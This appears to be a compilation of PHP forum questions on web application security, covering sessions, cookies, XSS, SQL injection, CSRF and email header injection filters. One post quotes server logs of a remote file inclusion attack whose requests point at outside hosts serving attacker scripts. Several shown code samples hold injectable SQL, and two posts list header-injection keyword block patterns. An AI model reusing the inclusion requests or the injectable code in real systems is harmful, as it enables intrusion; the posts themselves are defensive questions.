PHP - Session Security Question

Hi guys,    I would like to have a security measure in place to prevent unauthorized access to my site without a valid log on.      At the moment, it would let anyone in without destroying the session and redirecting to index page.      What would i "use" that's created in the session? what's the "best" practice    My understanding is that the session variable is stored in the browser, after a successful log in, that session variable is like baton or a key that's "passed" onto the next page.  - if someone tried to bypass the log on with the session then access is denied or redirected away.      So on my index page to start i have: 

<?php
session_start();


/* clear all session variable */
$_SESSION = array();

/* set a session variable for later use */
$_SESSION['what_page'] = "admin00";
?>

What do i need to have to use the session against unauthorized access?    my guess is: 

if(!isset($_SESSION['what_page']) || $_SESSION['what_page'] != "index.php") {
	$_SESSION = array();
	session_destroy();
	header("Location: index.php");	
	exit();
}

So to me that means;    - if 'what_page' is not set from the index page, don't go any further, re-direct (back to index)       If i remove this and use a known username and password, i am able to log into the correct page, but this session validation is the bit that's not working   please could you help?            

Hi,

I'd like to know the security of assuming session variables and using them for secure membership systems.

Could a malicious user not create a session, then change the session username to another user and effectively login as that user?

As I see it, no. Because session data is stored on the server and only a session id is stored on the client by way of a cookie.

But what if we used cookies? What is the solution to this? Because I know I could easily change ANY variables within a cookie.

I guess storing cookie data via db would help. But what is the best practice solution?

I see a lot of code which simply checks for a cookie with the variable 'logged_in' to true. It then manages the user by username or userid which are stored within the cookie but which can be changed with ease by a malicious user.

I'm trying to create a simple session on a form page that determines if you've signed in. If you haven't, it kicks you to the login page. But for some reason, what I have isn't doing that. When I open the page, it loads, but only prints the url on a blank page, instead of actually going to the url.

Code: [Select]
<html>
<title>form</title>
<link rel="stylesheet" type="text/css" href="style.css">
<body>

<?php
session_start();

if(isset($_SESSION['id']) && is_numeric($_SESSION['id'])) {
      

if (isset($_POST['submitted'])) {
$errors = array();


if (empty($_POST['scientific_name'])) {
$errors[] = 'you forgot to enter the scientific name';

} else {
$sn = trim($_POST['scientific_name']);
}

if (empty($_POST['common_name_english'])) {
$errors[] = 'you forgot to enter the common name';

} else {
$cne = trim($_POST['common_name_english']);
}

$description4 = trim($_POST['common_names_spanish']);
$description5 = trim($_POST['common_names_french']);
$description6 = etc. etc.

if (empty($errors)) {

require_once ('3_z_mysq1_c0nn3ct.php');

$query = "INSERT INTO plantae (scientific_name, common_name_english, etc.)
 VALUES ('$sn', '$cne', '$description4', '$description5', '$description6', '$description7', etc.)";

$result = @mysql_query ($query);


if ($result) {

if(isset($_POST['scientific_name']))
{
$plant_id=mysql_insert_id();
}


exit();
} else {
echo 'system error. No plant added';

echo '<p>' . mysql_error() . '<br><br>query:' . $query . '</p>';


exit();

}
 mysql_close();

} else {

echo 'error. the following error occured <br>';
foreach ($errors as $msg) {

echo " - $msg<br>\n";

}

} // end of if

} // end of main submit conditional


echo '<form action="insertaplant1.php" method="post"><fieldset><legend><b>Enter your new plant here</b></legend>


form fields here.

</form>'; 
      } else { 
       
      $url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']);

if((substr($url, -1) == '/') OR (substr($url, -1) == '\\') ) {
          $url = substr($url, 0, -1);
        }

$url .= '/login.php';

echo $url;
     
       exit(); 
       }

?>

hi there - good day dear fellows, 

the topic of today: session.save_path (/tmp) is not writable for web server :: security-risk!?

I am trying to install a script on my OpenSuse Webserver, and I managed to resolve most of the errors except of one:

The value for session.save_path (/tmp) is not writable for the web server.
Make sure that PHP can actually save session variables.

 

 That seems to be the problem.
 

 

session.save_path: writeable 
You need set permission for your var directory.

 

well - i guess that the default ownership may be incorrect on the session folder: 

Example; php on some Linux-Server defaults to apache user. 

If using nginx or other need to switch the folder ownership.  Also as a note you have to change the user/group setting in www.conf.

 

chown -R root:nginx /var/lib/php/7.0/
sed -i 's/apache/nginx/g' /etc/php-fpm-7.0.d/www.conf
service php-fpm-7.0 restart

 

But wait:  what about the security - is it save to make the session.save_path writeable!?

my server-admin says that this is a big big hole and makes the server unsecure. 

love to hear from you 

yours dil_bert

by the way: years ago i have had this issue on the server. 

but the question is - is this a securitiy risk!?  I need to know this. Look forward to hear from you 

Edited March 21, 2020 by dil_bert

Hi everyone!
I have a question that might sound silly...
I have stored in my database a url to a pic and some other data.
 I am unsure if when I retreive data from my database I need some sort of protection. I usually sanitize and prevent SQl injections when I code forms but I am not sure if I have to do the same when I get data from the database.

Thanks for your help.

Veronica

Hey people, I was going over an old script of mine the other day and I ran I web vulnerability scanner on it to see how secure it was and I got an XSS warning, now this puzzles me because I am not entirely sure how this affects the script and what can/can't be done, this script is old so I will paste the relevant bits in here, it was playing with the $page variable.  What damage could you do and how would you remedy the problem?

Code: [Select]
if(isset($_GET['page'])) {
if($_GET['page'] > $numpages) {
$page = 1;
} else {
$page = $_GET['page'];
}
} else {
$page = 1;
}


echo ('<strong style="margin-top: 4px; margin-left: 3px;">Page ' . $page . ' of ' . $numpages . '</strong></p>');

By putting a non-number in there like hello.php?page=Hello, it simply output the word hello so I am not fully sure what the security implications are and how insecure it really is.

Might sound like a dumb question but it's been nagging at me.

Thanks for reading!

Hi,

My ISP doesn't allow direct access to mysql Server so I created a bridge and stored the PHP code in the main web folder (https://www.mydomain.com/post.php).

The bridge works fine and is used mainly for my IOT projects.

In the same web folder, is located the conn.php code containing the server's credentials.

The question is, how safe is the PHP code at that location? I can create a subfolder but not sure if it matters as far as security is concerned.

TIA

HI all,

I have a book with some nice examples, but often i wonder if they are that secure for displaying and using outside the production area.

One of them is this.
A form is created by using a while loop that gets data(email addresses) from a database and shows them with check boxes. after that someone can select the e-mailaddress they don't like and delete them from the database.
here is some code:

<?php
        //....
        $result = mysqli_query($dbc,$query);

        while ($row = mysqli_fetch_array($result)){
            echo '<input type="checkbox" value"'.$row['id'].'"name="todelete[]"/>';
            echo $row['firstname'];
        }

        //.........deleting part
        if (isset($_POST['submit'])){
        foreach($_POST['todelete'] as $delete_id){
            
            $query = "DELETE FROM email_list WHERE ID = $delete_id";
                mysqli_query ($dbc, $query)
                        or die ('error querying databse');
                       
            }
        }
        //....
?>

I have two questions:
-> is this a smart way of deleting stuff? since you are going to use multiple queries instead of 1 in the for each loop.
-> besides not using mysqli_real_escape_string, isn't this application allowing someone to alter the POST-array (todelete) to any value he likes? At least that's what i think can happen. If anyone knows a nice way to do this more secure , I would love to here it, because i don't really trust the html array created.

Thanks in advance!

Apologies for the lame subject title - I don't know what to call this thread.

Last year, before I'd ever opened a book on php, my site was hacked.
I was using a third party e-commerce script 'Cart Keeper' (since replaced).

Somehow, the hackers planted some files on my server that looked like official bank pages (I'm sure you've all seen the sort of thing).

Here are some log files sent by my host at that time...

Quote

"GET
//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:48 +0100]
"GET
//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:49 +0100]
"GET
//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:59:24 +0100]
"GET
/arts//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 302 313 "-" "libwww-perl/5.65"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:26 +0100]
"GET
//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:28 +0100]
"GET
//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:32 +0100]
"GET
/ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 42 "-" "libwww-perl/5.805"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:47 +0100]
"GET
/ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:48 +0100]
"GET
/ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:49 +0100]
"GET
/ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt???
HTTP/1.1" 200 42 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:52 +0100]
"GET //ckshop.php?incdir=http://racrew.us/ec.txt?? HTTP/1.1" 200 357 "-"
"libwww-perl/5.65"


and here is what they wrote to me at the time...

Quote

The majority of these files where then caught by our egress firewall as
they had completed as the file in question had allowed the http user to
call a shell and use a variety of code (wget lwp et al) to call in
external toolkits.

This attack was mostly mechanised, however was changing so it is my
belief that the perpetrator was reconfiguring the attack as he went as
failures where seen.

Please check your site code for possible updates, security updates, and
ensure that no files have been changed that should not have been.

Please confirm that you have read this mail and are aware of the
implications / taking action.



Can someone identify the name of this type of attack?
...and possibly a tutorial on securing against this form of attack?
As I am learning php, I would like to make sure it doesn't happen again.


Many thanks for your help

Im making a map atm which will have tokens"not sure what you call them" in the link like
map.php?id=token

Well I dont want a 3rd party coming along in the future and making their own map using my y and x cords.
So I was thinking maybe the best way around this is to use a encryption in the link? so encrypting the x and y cords in the link.

Anyone have any ideas on this.

Also I was wondering is it impossible for php to know when somone clicks a link? I was googling around and it doesnt seem like you cant simply use a $_POST for a link

I have a php page that processes a form.  How do I prevent someone from making their own form on their own domain and then saying <form metod=post action = "www.hackerdomain.com/bad.php">

and then passing their own variables?

Do I set up a $session variable on my form page and assign it to  $_SERVER["PHP_SELF"]?

Hi all,

I have heard stories that hackers/viruses or basically something that you don't want uploaded to a server through a website form have been able to type some sort of code in to a html form field to access information.

I know how to control the length of fields, how to validate that an email address is in the correct format etc. - but when it comes to having a textfield for the user to add up to 2000 characters of their own words, how can I protect from malicious code being inserted?

The textfield is located inside the user area but anyone can join, so anyone ultimately can enter code!

Thanks for the help. 

I have a login system that uses a flat file database.  The flat file is in a directory outside the public_html.  My questions;

1- Is is still possible to hack into that file?

Currently I do not encrypt the passwords as I have been told that having the file outside the public_html makes the file unavailable to the public.  This allows me the advantage of sending the Username and Password to the user in an email if they forget there password or username.  Otherwise- I would have to set up a more complicated method to allow them to change their password to re-gain access to the site.  I have an SSL on the site also so I am not worried about packet sniffing.

Thanks

I am trying to keep the user input clean with this script but can't figure out what is wrong with it.
the error I am getting is Warning: preg_match() expects parameter 1 to be string,

 $bad_strings = array(
                "content-type:",
                "mime-version:",
                "multipart/mixed",
"Content-Transfer-Encoding:",
                "bcc:",
"cc:",
"to:",
   );
if (preg_match($bad_strings, $first_name)) {
    die;

Hi Guys

I have built a simple form, which has text fields Name, Telephone Number, Best Time to Call and E-mail.  For security purposes, I am testing each against the function shown below which looks for dangerous code snippets, in an effort to protect against email header injection attacks. 

When it comes to the E-mail field, I am not actually testing whether a valid e-mail address has been entered, as it is the telephone number which is essential, not the e-mail.  My question is, do you think this is a security weakness? 

Many thanks

Code: [Select]
//http://www.tonyspencer.com/2005/12/15/email-injection-exploit-through-a-php-contact-form/
//preg_match string to match goes within forward slashes, i.e. /str/, and i at the end makes it case insensitive
function containsInjectionAttempt($input) {
if (preg_match("/\r/i", $input) ||
preg_match("/\n/i", $input) ||
preg_match("/%0a/i", $input) ||
preg_match("/%0d/i", $input) ||
preg_match("/Content-Type:/i", $input) ||
preg_match("/<script>/i", $input) ||
preg_match("/bcc:/i", $input) ||
preg_match("/to:/i", $input) ||
preg_match("/cc:/i", $input)) {
return true;
} else {
return false;
}
}